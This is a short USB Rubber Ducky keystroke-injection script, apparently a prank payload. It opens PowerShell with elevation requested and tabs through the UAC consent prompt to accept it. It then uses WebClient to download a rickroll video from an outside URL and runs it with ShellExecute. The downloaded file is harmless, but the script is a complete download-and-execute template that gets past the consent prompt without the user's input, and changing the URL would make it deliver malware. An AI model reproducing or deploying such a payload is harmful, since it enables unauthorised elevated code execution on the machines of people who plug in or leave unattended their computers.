DELAY 2000
GUI r
DELAY 200
REM my best attempt at a elevated powershell instance
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 3000
TAB
TAB
ENTER
DELAY 500
ALT 
DELAY 3000
STRING $down = New-Object System.Net.Webclient; $url = 'https://repo.library.stonybrook.edu/xmlui/bitstream/handle/11401/9656/rickroll.mp4?sequence=1&isAllowed=y'; $file = 'rickroll.mp4'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit;
SPACE
ENTER	
